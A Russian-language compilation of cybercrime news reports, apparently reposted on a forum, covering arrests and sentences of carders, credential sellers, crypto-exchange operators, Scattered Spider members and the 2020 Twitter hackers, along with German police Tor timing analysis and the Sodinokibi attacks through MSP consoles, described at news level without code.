В информации, предоставленной ФБР, говорится, что с июня 2019 года все сообщения, размещенные профилем под названием VBKREZ, относятся к финансовым транзакциям через VF, в том числе в криптовалюте.
Позже анализ компьютера подозреваемого показал, что у него был пароль к профилю, где он редактировал публикации о работе форума, например, касающиеся взимания 5% за гарантию оказания услуги, особенно в разрешении споров между пользователями. Доступ осуществлялся из Португалии.
В ходе обысков по месту жительства Уголовная полиция застала Сергея работающим за компьютером, в котором площадка форума была открыта на рабочем столе. Случайно у него оказалось открыто окно с тысячами переводов, связанных с форумом, с оплаченными взносами за пользование, суммой каждой операции и администраторами. Что говорит о том, что подозреваемый знал о проводимых транзакциях внутри форума, которые он отрицал во время первого судебного допроса 19 мая.
Сергей Гусев подозревается в информационном саботаже, незаконном доступе, приобретении карт и других средств оплаты, полученных преступным путём, создании преступного сообщества и отмывании денежных средств. Обосновывая предварительный арест подозреваемого, судья высказал риск бегства и оказания препятствия расследованию.
• Source: <https://www.jn.pt/2463538137/denuncia-do-fbi-leva-a-captura-de- pirata-informatico-em-gaia/>
Госдума о будущем иностранных платформ в России.
Депутат Государственной Думы Алексей Николаевич Диденко в беседе с редакцией RuNews24.ru призвал не «цепляться» к YouTube, а задуматься о будущем. Он утверждает, что блокировка Google в России неизбежна, и это затронет не только сам поисковик, но и операционные системы Google Android и iOS:
«Скоро Google будет заблокирован, а вместе с ним и Google Android. Также будет заблокирован IOS, и это произойдёт не по нашей инициативе», - заявил парламентарий.
Он напомнил, что госслужащим и чиновникам, особенно имеющим доступ к конфиденциальной информации, уже давно запрещено пользоваться иностранными платформами. По его словам, это был первый сигнал для граждан о необходимости перехода на альтернативные сервисы. Представителям бизнеса и учёным следует заранее начать переход на другие платформы, чтобы избежать проблем в будущем, заявил Диденко.
Депутат также привел пример с Netflix, когда россияне лишились доступа к популярному стриминговому сервису. Первоначальное недовольство пользователей быстро утихло, и люди привыкли к новым условиям. Он подчеркнул, что ограничения коснулись не только политизированного контента, но и фильмов, сериалов и мультфильмов. «Не стоит питать иллюзий. Мы сталкиваемся с ограничениями и будем вынуждены ответить тем же. Это неизбежно», - заявил парламентарий.
Диденко особо отметил, что вопрос выживания наших систем и нашего суверенитета — это вопрос существования.
runews24.ru/society/02/08/2024/skoro-google-budet-zablokirovan-a-vmeste-s-nim- i-google-android-i-ios
Двоих кардеров задержали сотрудники по противодействию киберпреступности Витебской области совместно с коллегами из Гомеля при силовой поддержке ОМОН. Об этом БЕЛТА сообщили в МВД.
Задержанные - гомельчане в возрасте 17 и 20 лет. Старший из них в конце 2023 года нашел нелегальную подработку, суть которой заключалась в покупке в онлайн-магазинах дорогостоящих товаров. Расчет за них вели краденые банковскими картами, реквизиты которых передавал "наниматель".
Второй, несовершеннолетний, фигурант выполнял роль дропа, которое было готово предоставить свои персональные данные. Это было необходимо для оформления заказов и получения товара. Затем товар перепродавали, используя различные интернет-площадки.
Половина суммы предназначалась для организатора преступной схемы, остальную часть делили молодые люди.
За хищение имущества путем модификации компьютерной информации в крупном размере следователи возбудили уголовное дело. Устанавливается, причастны ли фигуранты к аналогичным преступлениям и были ли другие соучастники, которые оформляли на себя покупки.
Кавжарадзе получил 40 месяцев тюрьмы за продажу 300 тыс. ворованных записей с данными клиентов банков. Ущерб от его действий составил более $1 млн. Россиянина ранее экстрадировали в США, он признал вину.
Окружной суд США приговорил 27-летнего москвича по имени Георгий Кавжарадзе к 40 месяцам тюрьмы за продажу краденых банковских данных. Об этом сообщила прокуратура округа Колумбия.
Суд согласился с доводами обвинения, что Кавжарадзе был «активным продавцом краденой финансовой информации, учетных данных и другой личной идентификационной информации (PII) на криминальном интернет-рынке под названием Slilpp». В результате он был осужден на 40 месяцев тюремного заключения. Отбывать наказание россиянин будет в США.
Также Кавжарадзе обязали возместить более $1 млн ущерба, причиненного его действиями.
По версии обвинения, Кавжарадзе в период с июля 2016 года по май 2021 года, используя псевдоним «TeRorPP», выставил на продажу более 626 тыс. записей краденных учетных данных для авторизации, из которых более 297,3 тыс. смог продать на теневом рынке. Данные могли быть использованы для кражи средств с онлайн- и банковских счетов жертв.
Эти учетные данные впоследствии оказались связаны с мошенническими транзакциями на сумму $1,2 млн, заключило следствие.
Сам Кавжарадзе принимал оплату биткоинами при продаже данных. ФБР полагает, что он снял $200 тыс. прибыли Slilpp со своего счета в биткои
Slilpp — маркетплейс в теневом сегменте интернета, через который члены преступных сообществ обменивались и торговали ворованными данными учетных записей, в основном, логинами и паролями. В июне 2021 года американский Минюст сообщил, что совместными усилиями правоохранительных органов США, Германии, Нидерландов и Румынии площадку удалось обезвредить.
Кавжарадзе был экстрадирован в Соединенные Штаты. По информации окружной прокуратуры, он признал себя виновным в сговоре с целью совершения банковского мошенничества и мошенничества с использованием электронных средств связи.
rbc.ru/society/15/08/2024/66bd1fc19a79472d5226a73a

Marketplace ](https://www.codeaintel.com/p/xssis-account-sales-a-deep-dive- into)
At the heart of this ecosystem lies XSS.is, an invitation-only Russian- speaking hacking forum that has long been a nexus for some of the world's most sophisticated cyber threats.
 www.codeaintel.com
"сложные задачи по развитию навыков программирования"
Немецкие правоохранительные органы начали активно использовать новые методы для деанонимизации пользователей сети Tor. Журналисты ARD-Politikmagazin Panorama и STRG_F (funk/NDR) выяснили, что спецслужбы Германии применяют длительный мониторинг серверов Tor, чтобы раскрыть личности пользователей. Такие меры направлены, прежде всего, на борьбу с преступностью в даркнете.
Исследования показали, что полученные данные обрабатываются специальными статистическими методами, которые позволяют полностью разрушить анонимность Tor. Журналисты смогли ознакомиться с документами, подтверждающими успешное применение подобных способов в четырёх случаях. Это первые зафиксированные случаи использования так называемого временного анализа «Timing-Analyse» в рамках одного уголовного дела. Ранее считалось, что подобные действия практически невозможны.
Tor — крупнейшая в мире сеть для анонимного использования интернета. Пользователи перенаправляют свои подключения через различные серверы, чтобы скрыть свои действия в сети. В мире насчитывается около 8 000 узлов Tor, расположенных в 50 странах. Около 2 млн. человек ежедневно используют эту сеть. Tor особенно популярен среди журналистов, правозащитников и активистов, особенно в странах с цензурой в интернете. Многие медиа, такие как Deutsche Welle, используют Tor, чтобы предоставлять доступ к своим сайтам в странах с ограничениями на свободное распространение информации.
Однако анонимность в сети Tor привлекает не только правозащитников, но и преступников, которые используют сеть для кибератак и ведения незаконной деятельности на даркнет-платформах. Ранее правоохранительные органы сталкивались с серьёзными техническими трудностями при попытках раскрыть личность пользователей. Однако недавние расследования Panorama и STRG_F показали, что стратегия была изменена, и теперь используется долговременное наблюдение за узлами сети.
Суть Timing-Analyse заключается в мониторинге большого количества узлов Tor. Принцип работы метода заключается в сопоставлении временных меток передачи данных через различные узлы сети. Несмотря на многоуровневое шифрование соединений в Tor, анализ позволяет следить за движением данных между узлами и пользователями, выявляя определённые закономерности, которые могут указать на конкретного человека.
Даже если трафик многократно зашифрован, сопоставление времени отправки и получения пакетов данных даёт возможность определить источник соединения. Ключевым элементом техники является необходимость контролировать как можно больше узлов в сети Tor. Это делает возможным анализ корреляций между временем отправки и получением данных, что в конечном итоге приводит к деанонимизации.
Одним из успешных примеров применения данного метода стало дело против даркнет-платформы Boystown. Следователи смогли определить Tor-узлы, которые использовались одним из администраторов платформы для сокрытия своей деятельности. Специалисты также смогли выявить серверы чата, где общались члены преступных сообществ. Это позволило правоохранительным органам идентифицировать и арестовать преступников.
Сотрудничество с правоохранительными органами Нидерландов и США также сыграло ключевую роль в раскрытии преступлений, связанных с сетью Tor. Количество узлов, находящихся под контролем в Германии, значительно возросло за последние годы, что дало возможность шире использовать метод Timing-Analyse.
Эксперты предупреждают, что подобные технологии могут быть использованы не только для борьбы с преступностью, но и для преследования оппозиционеров в странах с репрессивными режимами. Представители Tor Project уже заявили, что принимают меры для повышения уровня анонимности пользователей, чтобы предотвратить подобные атаки в будущем.
Напомним, что недавно немецкие правоохранительные органы провели обыск в доме и офисе, зарегистрированных на адрес организации Artikel 5 e.V., занимающейся поддержкой сети Tor. Это уже второй подобный случай после аналогичного рейда в 2017 году.
tagesschau.de/investigativ/panorama/tor-netzwerk-100.html
На этой неделе Министерство юстиции США сообщило, что 41-летний Винсент Рамос, возглавлявший компанию Phantom Secure, был приговорен к девяти годам лишения свободы. Рамос продавал смартфоны BlackBerry и Android с PGP шифрованием наркокартелям и другим преступным группировкам по всему миру.
Расследование в отношении Винсента Рамоса началось еще в 2017 году, после того как полиции стало известно о существовании его компании и необычных услуг, которые она оказывала. Впервые Phantom Secure попала на радары экспертов во время ареста Оуэна Хансона, бывшего футболиста USC, который был задержан при попытке провезти тонну кокаина из Мексики в США. Тот использовал сразу несколько устройств Phantom Secure.
В итоге Рамос был арестован еще марте 2018 года, и уже осенью того же года признал себя виновным. Напомню, что по данным американских правоохранителей, компания Phantom Secure сознательно продала зашифрованные смартфоны разным преступным группировкам в США, Мексике и Австралии. Такие телефоны давали преступникам возможность надежно шифровать свои сообщения и удаленно обнулять устройства, если член группы был арестован, а его смартфон попал в руки властей.
По информации Минюста США, устройства Phantom Secure в частности применялись членами картеля Синалоа для организации перевозки наркотиков из Мексики в США, а также членами мотоклуба «Ангелы ада» для организации нескольких убийств. После ареста Рамоса правоохранители смогли изучить сеть Phantom Secure и обнаружили, что та состояла из серверов по всему миру (Австралия, Канада, Гонконг, Панама, Таиланд и США).
К моменту ареста Рамоса в 2018 году в мире работали более 7000 устройств Phantom Secure, а за все время своего существования компания успела продать более 20 000 зашифрованных смартфонов (почти половина из них были проданы в Австралии).
По данным ФБР, подписка на сервис Phantom Secure стоила порядка 2000-3000 долларов за полгода. Для защиты анонимности клиентов и деятельности самой Phantom Secure, сделки в основном производились с помощью в цифровых валют и криптовалют. За упомянутую сумму клиент получал готовое устройство, софт и железо на котором были модифицированы таким образом, чтобы обеспечить максимальную анонимность и шифрование всех коммуникаций.
Согласно сделке, которую Рамос ранее заключил со следствием, у него изымут 80 миллионов долларов и другие активы на десятки миллионов долларов, в том числе золотые монеты, криптовалютные счета, недвижимость и элитные автомобили.
Напомню, что власти предъявили обвинения и еще четырем сотрудникам Phantom Secure, которые выступали соучастниками Рамоса, но эти люди все еще остаются на свободе, скрываясь от властей.
• Source: justice[.]gov/usao-sdca/pr/chief-executive-communications-company- sentenced-prison-providing-encryption-services
ФБР задержало британского хакера в Испании за кражу 27 миллионов долларов в биткоинах
22-летний британец был арестован в Пальма-де-Майорке в результате совместных усилий испанской полиции и ФБР по подозрению в том, что он является главарем хакерской группы, которая атаковала 45 компаний и людей в США.
Мужчина был арестован в аэропорту Пальмы, когда готовился к посадке на рейс в Италию.
Его обвиняют во взломе корпоративных счетов и краже важной информации, что, предположительно, позволило группе получить доступ к многомиллионным средствам. По данным полиции Пальмы, в какой-то момент он "контролировал" биткоины на сумму 27 миллионов долларов.
Впервые тревогу подняло ФБР в Лос-Анджелесе после того, как атаке подверглись несколько компаний. Они обратились к своим испанским коллегам за информацией о 22-летнем подозреваемом. Испанская полиция установила, что он въехал в Испанию через Барселону в конце мая, а дальнейшее расследование привело к тому, что он оказался на Майорке.
Судья в Лос-Анджелесе выдал ордер на его арест, который детективы полиции Пальмы исполнили, когда он готовился сесть на рейс в Италию. Расследование продолжается как в Испании, так и в Калифорнии. Полиция не установила личность 22-летнего преступника.
Во время ареста у него были изъяты ноутбук и мобильный телефон.
• Video: [https://murciatoday.com/video-fbi-t...A 22-year-old British,board a flight to Italy](https://murciatoday.com/video-fbi-take-down-uk-hacker-in- spain-for-stealing-27m-usd-of-bitcoins_1000077536-a.html#:~:text=A%2022-year- old%20British,board%20a%20flight%20to%20Italy)
*****
22-летний мужчина из Великобритании, арестованный на этой неделе в Испании, предположительно является главарем киберпреступной группы Scattered Spider, подозреваемой во взломе Twilio, LastPass, DoorDash, Mailchimp и еще почти 130 организаций за последние два года.
Испанская газета Murcia Today сообщает, что подозреваемый был объявлен в розыск ФБР и арестован в Пальма-де-Майорке, когда пытался сесть на рейс в Италию.
"Его обвиняют во взломе корпоративных счетов и краже важной информации, что якобы позволило группе получить доступ к многомиллионным средствам", - пишет Murcia Today. "По данным полиции Пальмы, в какой-то момент он контролировал биткоины на сумму 27 миллионов долларов".
Twitter/X-аккаунт vx-underground, посвященный киберпреступности, сообщил, что арестованный британец был подменщиком SIM-карт под псевдонимом "Tyler". При атаке с подменой SIM-swapper мошенники переносят номер телефона жертвы на контролируемое ими устройство и перехватывают все текстовые сообщения и телефонные звонки, отправленные жертве, включая одноразовые коды для аутентификации или ссылки на сброс пароля, отправленные по SMS.
"Он известен как подменщик SIM-swapper и предположительно связан с печально известной группировкой Scattered Spider", - написал vx-underground 15 июня, ссылаясь на банду, причастную к дорогостоящим атакам с целью выкупа данных в казино MGM и Caesars в Лас-Вегасе в прошлом году.
Источники, знакомые с ходом расследования, сообщили KrebsOnSecurity, что обвиняемым является 22-летний житель Данди, Шотландия, по имени Тайлер Бьюкенен (Tyler Buchanan), также предположительно известный под ником "tylerb" в чат-каналах Telegram, посвященных обмену SIM-swapping.
В январе 2024 года власти США арестовали еще одного предполагаемого члена Scattered Spider - 19-летнего Ноа Майкла Урбана (Noah Michael Urban) из Палм- Коста, штат Флорида, - и предъявили ему обвинение в краже не менее 800 000 долларов у пяти жертв в период с августа 2022 по март 2023 года. Урбан, предположительно, использовал прозвища "Sosa" и "King Bob" и, как полагают, входил в ту же команду, которая взломала Twilio и ряд других компаний в 2022 году.
Следователи говорят, что члены Scattered Spider являются частью более разрозненного сообщества киберпреступников в Интернете, известного как "The Com", где хакеры из разных кланов громко хвастаются громкими киберкражами, которые почти всегда начинаются с социальной инженерии - обмана людей по телефону, электронной почте или SMS с целью заставить их отдать учетные данные, которые позволяют получить удаленный доступ к внутренним сетям компаний.
Один из самых популярных каналов по обмену SIM-swapping в Telegram ведет часто обновляемую таблицу лидеров самых успешных обманщиков SIM-swappers, индексируемую по их предполагаемым успехам в краже криптовалюты. В настоящее время Sosa находится на 24-м месте (из 100), а Tylerb - на 65-м.
• Source: krebsonsecurity[.]com/2024/06/alleged-boss-of-scattered-spider- hacking-group-arrested/
Его доставили в следственный департамент МВД, где с ним проводятся следственные действия
Основатель международной компании Chronopay Павел Врублевский задержан в рамках уголовного дела о мошенничестве. Об этом ТАСС в четверг сообщил источник в правоохранительный органах.
"Павел Врублевский задержан в рамках возбужденного дела по ст. 159 УК РФ ("Мошенничество"). В настоящее время он доставлен в следственный департамент МВД, где с ним проводятся следственные действия", - сказал собеседник агентства.
Источник добавил, что вопрос о мере пресечения Врублевскому будет решаться по итогам допроса.
Павел Врублевский является основателем и владельцем международной компании Chronopay, которая специализируется на процессинге банковских карт в интернете. В июне 2011 года бизнесмен был арестован и затем осужден по ч. 2 ст. 272 УК РФ ("Неправомерный доступ к компьютерной информации, принесший крупный ущерб или совершенный из корыстной заинтересованности") за организацию интернет-атаки (DDoS) на сайт конкурирующей платежной системы "Ассист", которая обслуживала продажи электронных билетов "Аэрофлота". В результате система продаж билетов была выведена из строя, "Аэрофлот" перешел на обслуживание к Альфа-банку и подал иск на сумму 194 млн рублей к ВТБ24, который через "Ассист" занимался процессингом платежей за билеты. В 2014 году он заявил, что возвращается к управлению компанией.
source: tass.ru/proisshestviya/14021267
Дмитрий Васильев руководил Wex, со счетов которой пропало $450 млн. Он находится в СИЗО. Запрос о его экстрадиции подавал Казахстан. Wex стала правопреемником биржи BTC-e, рухнувшей в июле 2017 года после ареста Александра Винника
В Варшаве арестовали бывшего руководителя крупнейшей российской криптовалютной биржи Wex Дмитрия Васильева. Об этом со ссылкой на источники сообщает польское издание Wyborcza. Информацию о его аресте подтверждает Би-би-си.
По данным газеты, Васильев был задержан в аэропорту Варшавы еще в середине августа, однако об этом стало известно только сейчас. «Экс-руководитель криптовалютной биржи Wex Дмитрий Васильев, со счетов которой пропало $450 млн, сидит в варшавском СИЗО», — пишет издание.
Газета утверждает, что руководство биржи Wex, на которой торговали биткоинами и другими криптовалютами, несет ответственность за исчезновение денег, принадлежащих инвесторам из Европейского союза, в том числе Польши, а также других стран по всему миру. По данным Wyborcza, Окружной суд Варшавы постановил временно арестовать Васильева на 40 суток. Запрос о его экстрадиции подал Казахстан. Сейчас польская прокуратура рассматривает вопрос об экстрадиции Васильeва в Казахстан.
Слухи о задержании Васильева ходили среди бывших клиентов биржи Wex с конца августа. Близкий знакомый Васильева подтвердил Би-би-си, что он действительно находится под арестом в Варшаве. В пресс-службе польской полиции на вопрос об аресте Васильева сообщили, что не могут разглашать информацию.
Криптовалютная биржа Wex заработала в сентябре 2017 года. Она располагала информацией о клиентах прекратившей свое существование в 2017 году криптовалютной биржи BTC-e. Основатель BTC-e — гражданин России Александр Винник, который был арестован в 2017 году в Греции по запросу США, где его обвиняют в отмывании от $4 млрд до $9 млрд через созданную им биржу. Экстрадиции Винника кроме США добивались Россия и Франция. Сам он в 2018 году признавался российским правоохранителям в хищении 750 млн руб. Он сообщал, что хочет «добровольной» экстрадиции в Россию. В январе 2020 года власти Греции выдали его Франции, где Винника подозревали в краже личных данных и вымогательстве. В конце прошлого года парижский суд приговорил Винника к пяти годам тюремного заключения. Его адвокат Фредерик Бело говорил, что рассмотрение апелляции займет около четырех месяцев. Однако приговор не означал, что весь срок он пробудет во Франции. В феврале суд в Париже отклонил апелляцию защиты и оставил россиянина под стражей.
Как писал РБК, к концу 2017 года ежедневный объем торгов на Wex достигал $80 млн, она входила в двадцатку самых популярных криптобирж мира, но к лету 2018 года обороты упали до $20 млн. В начале своей работы руководство Wex пообещало рассчитаться по долгам BTC-e. Оператором площадки указывалась сингапурская World Exchange Services, ее единственным собственником назывался уроженец Минска Дмитрий Васильев. Создатели новой биржи приобрели у собственников закрытой площадки «цифровые активы» — информацию о пользователях и их криптокошельках. Сумму сделки Васильев не раскрывал, а имен экс-владельцев BTC-e якобы не знал. Позднее Васильев заявлял, что с 2018 года не имеет никакого отношения к Wex. В 2019 году сообщалось, что в Казахстане он был объявлен в розыск.
Би-би-си писала, что реальным собственником Wex при Васильеве мог быть житель Новосибирска Алексей Билюченко — партнер Винника по BTC-e. После Wex Васильев пытался развивать собственные криптопроекты, в последнее время жил в Петербурге.
В июле 2018 года РБК писал, что биржу криптовалют Wex пытался купить киевский предприниматель Дмитрий Хавченко, который воевал на востоке Украины под позывным «Морячок». За «Морячком», как отмечала Би-би-си, мог стоять российский предприниматель и председатель совета директоров группы компаний «Царьград» Константин Малофеев. Сам Малофеев всегда отрицал, что имел какое- либо отношение к Wex. В конце ноября 2018 года издание выяснило, что у сингапурской компании World Exchange Services — официального оператора биржи Wex — сменился собственник. Новым владельцем стала москвичка Дарья Хавченко — 29-летняя дочь «Морячка». Сам Хавченко рассказал изданию, что изначально он планировал записать биржу на себя. Однако, по его словам, сотрудников сингапурского бизнес-реестра что-то не устроило в его прошлом — возможно, участие в вооруженном конфликте в Донбассе.
Летом 2019 года Би-биси узнала о задержании Васильева в Италии. Официальная причина задержания не называлась, однако на сайте полиции региона Базиликата можно было обнаружить сообщение, датированное 16 июля, в котором без указания имени сообщалось о задержании 32-летнего мужчины «белорусской национальности». В нем уточнялось, что мужчина задержан по запросу Интерпола в связи с уголовным делом, заведенным в Казахстане. Он якобы незаконно завладел крупной суммой денег. В августе 2019 года издание писало, что власти Италии освободили Васильева, несмотря на то, что в его отношении были возбуждены уголовные дела в России, Белоруссии и Китае.
source: wyborcza.pl/7,75398,27578061,rosyjski-krol-kryptowalut-w-polskim- areszcie-byl-zwiazany- ze.html?disableRedirects=true&fbclid=IwAR3E-ouK1TooXEfOqtUf_rdGm0ob5g9ek2z7JF11Ua3lRHdvjy8jRhlWZsk
Британский суд решил не выдавать основателя WikiLeaks США из-за угрозы самоубийства. Вашингтон подал апелляцию. В США Джулиану Ассанжу грозит до 175 лет тюрьмы.
В Великобритании в среду, 11 августа, начались предварительные слушания по апелляции США на отказ Лондона выдать Вашингтону основателя портала WikiLeaks Джулиана Ассанжа. У здания суда в британской столице прошла акция сторонников 50-летнего австралийца, призывающих выпустить его. Сам Ассанж появился в суде впервые за более чем 6 месяцев.
Суд в Лондоне в начале января отказался выдать его Соединенным Штатам, объяснив, что в случае экстрадиции риск совершения Ассанжем самоубийства существенно вырастет. В том же месяце суд отказался освободить австралийца под залог. В США создателя WikiLeaks обвиняют в "самом крупном хищении секретной информации в истории страны". В случае вынесения обвинительного приговора ему грозит до 175 лет тюрьмы.
По данным Вашингтона, Ассанж помог американскому военнослужащему Брэдли Мэннингу (впоследствии сменившему пол и ставшему Челси Мэннинг) получить доступ к секретным материалам, касающимся военных операций США в Ираке и Афганистане. В результате публикации этих материалов на WikiLeaks общественности стало известно о ряде преступлений, совершенных американскими солдатами на Ближнем Востоке.
Арест Ассанжа в посольстве Эквадора
В 2012 году Джулиан Ассанж укрылся в посольстве Эквадора в Лондоне, опасаясь ареста по европейскому ордеру, выданному Швецией на основании возбужденного дела об изнасиловании. Основатель WikiLeaks считал, что Швеция может экстрадировать его в США. Позднее шведские органы юстиции прекратили предварительное расследование в отношении разоблачителя.
Полиция Великобритании в апреле 2019 года арестовала Джулиана Ассанжа в посольстве Эквадора. Южноамериканское государство лишило создателя WikiLeaks убежища, ссылаясь на нарушение международных конвенций. В июле 2021 года суд в Эквадоре лишил Ассанжа гражданства этой страны.
В Бостоне прокуратура выдвинула обвинения украинскому гражданину Виталию Антоненко, сообщает Forbes.
По информации, мужчину подозревают в ряде киберпреступлений в финансовой сфере.
В следствии указано, что Антоненко вместе с сообщниками продавал в даркнете информацию о банковских картах, а полученные деньги крал через криптовалюту.
Полиция связывает Антоненко с двумя биткоин-кошельками, через которые прошло 94 млн долларов. В момент ареста на обоих кошельках находилось более 140 тыс. долларов в биткоинах.
В соответствии с законодательством США Антоненко может получить до 20 годам лишения свободы и штраф до 500 тыс. долларов.
Также отмечается, что Антоненко был задержан американской полицией в марте 2019 года в Нью-Йорке после прилета из Украины.
Источник: mignews.com.ua/proisshestviya/24089581.html
На сегодняшний день (12,03,21 г.) и телеграмма удалили достаточно популярного
бота "Глаз Бога".
Скорей всего это было сделано по просьбе РКН(дальше планируют удалять
остальные боты по пробиву), что ещё раз подтверждает что данный мессенджер
совсем не безопасный для "ваших черных делишек" и сливает инфу властям...Но
это и так все знают. Всем удачи.
P.S. Не думаю что это в целом повлияет на сервисы пробива.
15 июля 2020 произошёл самый громкий взлом Twitter за всю историю этого сервиса. Были взломаны более сотни верифицированных аккаунтов, в том числе компании Apple, Илона Маска, Джеффа Безоса, Барака Обамы, Билла Гейтса, других известных бизнесменов и политиков. С каждого аккаунта хакеры опубликовали предложение поучаствовать в пирамиде и перечислить биткоины на указанный кошелёк, обещая вернуть их в двойном размере. За несколько часов они заработали более $100 000.
Грэм Кларк
Расследованием преступления занялись несколько спецслужб США, включая Секретную службу и ФБР — и спустя две недели они нашли подозреваемых. Это два подростка: 17-летний Грэм Кларк из Тампы (главарь банды на фото вверху) и 19-летний Мейсон Шеппард из Богнор-Риджиса, Великобритания, под хакерским псевдонимом Chaewon, а также 22-летняя девушка Нима Фазели из Орландо под хакерским псевдонимом Rolex.
Спецслужбы добыли неопровержимые доказательства вины. Фрагмент переписки Кларка с Rolex показан на скриншоте ниже.
Кларк (Kirk) в чате Discord говорит девушке, что является сотрудником Twitter и может дать ей любой аккаунт.
Подозреваемый во взломе Грэм Кларк помещён под арест, а двоим другим предъявлены обвинения.
ФБР утверждает, что всего под стражей находятся два человека. Кроме Кларка, это ещё неизвестный несовершеннолетний из Калифорнии, который признался, что помогал Chaewon продавать доступ к аккаунтам в Twitter.
Согласно обвинительному заключению, опубликованному вчера поздно вечером, у властей есть вероятные основания полагать, что Кларк получил доступ к внутренним инструментам Twitter и непосредственно осуществил мошенничество. В частности, он якобы убедил сотрудника Twitter, что работает в IT-отделе Twitter, и обманом заставил сотрудника предоставить ему учётные данные.
Из показаний: «Кларк использовал социальную инженерию, чтобы убедить сотрудника Twitter в том, что он является сотрудником IT-отдела, и попросил его предоставить учётные данные для доступа к порталу обслуживания клиентов. Затем Кларк получил доступ к твиттер-аккаунтам известных людей, включая вице- президента Джо Байдена, бывшего президента Барака Обаму и компаний, таких как Apple и Coinbase. Затем Кларк разместил на своих аккаунтах в Twitter сообщение о том, что если биткоины будут отправлены на счета, то они будут удвоены и возвращены жертве. Кларк не вернул деньги и перевёл их на другой счёт. Десять известных людей предварительно предоставили личную идентификационную информацию в виде верифицированного твиттер-аккаунта, который без согласия был использован в мошеннической деятельности. Кларк получил приблизительно 117 000 долларов в ходе осуществления своей схемы мошенничества».
Раньше было неизвестно, как именно злоумышленник получил доступ к внутренним системам. Twitter просто заявил, что стал жертвой фишинговой атаки, а предыдущие отчеты предполагали, что хакер проник в служебный канал Slack либо сумел подкупить сотрудника.
ФБР пояснило, что хакера удалось вычислить через аккаунты на биржах Binance и Coinbase, где Кларк предъявил свои водительские права (это самое распространённое удостоверение личности в США), а на эти аккаунты он перевёл часть средств, полученных мошенническим путём.
Нима Фазели также предъявила водительские права для верификации аккаунта в Coinbase, куда приходили средства со счетов, которые контролировала Rolex.
Девушке грозит пять лет тюрьмы и штраф в размере $250 000 долларов за каждое «компьютерное вторжение».
Шеппард обвиняется в «компьютерном вторжении» (5 лет), участии в организованной группе для мошенничества (20 лет) и отмывании денег (20 лет).
Судя по всему, Шеппард и Фазели были просто посредниками и помощниками, а доступ к компьютерным системам Twitter получил хакер под псевдонимом “Kirk#5270”. Судя по всему, это и есть Кларк, хотя ФБР продолжает расследование и всё ещё ищет новых подозреваемых.
Сейчас Кларк находится в тюрьме и обвиняется более чем в 30-ти уголовных преступлениях, включая организованное мошенничество, мошенничество с коммуникациями (wired fraud), кражу личных данных и взлом.
• Source: fbi.gov/contact-us/field-offices/sanfrancisco/news/press- releases/statement-from-fbi-san-francisco-assistant-special-agent-in-charge- sanjay-virmani-on-arrests-in-twitter-cyber-attack
В развитие опубликованных МИД России 2 сентября 2013 года, 10 апреля 2014 года, 22 мая 2015 года, 11 апреля 2016 года, 16 февраля 2017 года, 1 февраля 2018 года и 25 января 2019 года предупреждений гражданам Российской Федерации хотели бы вновь обратить внимание выезжающих за рубеж соотечественников на угрозу подвергнуться преследованию американскими правоохранительными органами и специальными службами. Такая опасность существует как в самих США, так и по запросам их властей в третьих странах.
Вынуждены констатировать, что несмотря на наши многочисленные призывы к нормализации взаимодействия на основе российско-американского Договора о взаимной правовой помощи по уголовным делам от 1999 года, правоохранительные органы США активно продолжают аресты россиян по всему миру. С 2008 года на территории третьих государств зафиксировано уже 53 таких случая, из которых шесть произошло в 2019 году.
Неоднократно сталкивались с ситуациями, когда американские спецслужбы организовывали против наших граждан откровенные провокации и даже похищения. Так произошло в 2010 году в Либерии с К.В.Ярошенко и в 2014 году на Мальдивских островах с Р.В.Селезневым, которых без всякого разбирательства насильственно перевезли в США.
Граждане России, оказавшись в руках американской юстиции, нередко сталкиваются с предвзятым отношением и настоящим правовым произволом. Чтобы добиться признательных показаний по сфабрикованным делам, их подвергают мощному психологическому давлению, создают невыносимые условия содержания, как в ситуации с М.В.Бутиной, которую в США осудили только за ее российский паспорт. В случае отказа от признания какой-либо вины, наших соотечественников показательно приговаривают к огромным тюремным срокам, что выпало на долю упомянутых К.В.Ярошенко и В.А.Бута.
Показателен также пример Б.А.Осиповой, которой в США вменили похищение собственных дочерей, а требования к бывшему американскому супругу, поднимавшему на нее руку, о выплате алиментов расценили как вымогательство. При этом ее открыто шантажировали, обещая уменьшить семилетний срок заключения, если она отдаст детей, проживающих в России и являющихся российскими гражданами.
Ситуация осложняется тем, что после закрытия американскими властями в 2017-2018 годах генеральных консульств России в Сан-Франциско и Сиэтле наша страна полностью лишилась консульского присутствия на Западном побережье США. Это серьезно ударило по возможностям своевременно оказывать поддержку содержащимся там в тюрьмах россиянам.
Российские дипломаты, разумеется, прилагают все усилия для помощи оказавшимся в беде соотечественникам, обеспечения их законных прав и скорейшего возвращения на Родину. Хотели бы, однако, рекомендовать при планировании зарубежных поездок тщательно взвешивать существующие риски преследования с американской стороны. Прежде всего, это относится к выездам в США и страны, имеющие с ними договоры о выдаче. Со списком таких государств можно ознакомиться на сайте:
https://2009-2017.state.gov/documents/organization/71600.pdf
.
• Source: https://www.mid.ru/ru/foreign_policy/news/-/asset_publisher/cKNonkJE02Bw/content/id/4046286
17.02.20
Сразу несколько компаний стали жертвами кибервымогателей в результате атаки как минимум на трех MSP-провайдеров. Злоумышленники получили доступ к консолям удаленного управления Webroot и Kaseya, чтобы установить организациям шифровальщик Sodinokibi.
О проблеме стало известно из дискуссии на Reddit. Представитель компании UBX Cloud, занимающейся поддержкой и консультацией MSP-провайдеров, сообщил о возможной атаке на одного из партнеров организации. Как стало известно позже, преступники взломали как минимум трех поставщиков IT-услуг и доставили их клиентам вредоносное ПО.
По имеющимся данным, вымогатели проникли в инфраструктуру MSP-провайдеров через незащищенное RDP-соединение, повысили свои привилегии в системе и отключили защитное ПО производства Webroot и ESET. После этого, предположительно при помощи скомпрометированных учетных данных, они получили доступ к аккаунтам компаний в двух программах удаленного управления IT- инфраструктурой — Kaseya VSA и Webroot SecureAnywhere.
По данным компании Huntress Labs, привлеченной к расследованию инцидента, через Webroot злоумышленники запускали на устройствах клиентов MSP-компаний вредоносный PowerShell-скрипт, загружающий в систему зловреда. Полезной нагрузкой предположительно является шифровальщик Sodinokibi — относительно новый представитель своего класса, первые атаки которого пришлись на весну 2019 года.
Через консоль Kaseya преступники загружали и исполняли скрипт 1488.bat, также доставлявший Sodinokibi на устройства жертв. Представители Huntress Labs отмечают, что через файлы с похожими названиями в мае распространялся вымогатель GandCrab. У двух кампаний есть и другие общие черты: в обоих случаях злоумышленники отключали защитные решения и использовали ПО для удаленного управления системой. Правда, майские атаки проводились через программу ConnectWise Control.
